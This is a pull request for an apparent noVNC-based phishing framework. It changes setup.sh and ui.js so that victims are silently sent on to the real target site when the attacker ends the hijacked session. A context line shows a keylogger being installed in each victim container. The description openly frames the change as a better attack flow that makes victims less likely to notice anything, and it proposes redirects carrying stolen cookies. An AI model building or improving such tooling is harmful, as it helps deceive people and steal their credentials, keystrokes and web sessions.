### PR TITLE
feature: Implement redirect to target site on forcefull disconnect

### DIFF
--- a/setup.sh
+++ b/setup.sh
@@ -367,6 +367,10 @@ case "$1" in
 	    	
 	    fi
 	    
+	    # Replace TARGET_URL placeholder with actual target inside vnc/ui.js
+            sudo docker cp ./vnc/ui.js vnc-user$c:/usr/libexec/noVNCdim/app/
+            sudo docker exec --user root vnc-user$c sh -c "sed -i 's/TARGET_URL/${Target//\//\\/}/g' /usr/libexec/noVNCdim/app/ui.js"
+	    
 	    # Keylogger
 	    sudo docker cp ./vnc/logger.py vnc-user$c:/home/headless/   
 	    sleep 1

--- a/vnc/ui.js
+++ b/vnc/ui.js
@@ -1146,8 +1146,9 @@ const UI = {
             UI.reconnectCallback = setTimeout(UI.reconnect, delay);
             return;
         } else {
-            UI.updateVisualState('disconnected');
-            UI.showStatus(_("Disconnected"), 'normal');
+            window.open('TARGET_URL', '_parent');
+            //UI.updateVisualState('disconnected');
+            //UI.showStatus(_("Disconnected"), 'normal');
         }
 
         document.title = PAGE_TITLE;


### PR DESCRIPTION
This change would redirect the victim to the target site when attacker disconnects his session.

Currently, the victim will see 502 error page since he has been disconnected from the noVNC session.

With this change, it will only redirect him to the target site without importing the cookies which means victim will be _logged out_ from the website but I still think it's a better attack flow.

I might work on a _seamless_ redirect where user is redirected to the page he was at the moment with imported cookies in his browser which would improve the attack flow and it would be harder for user to notice anything.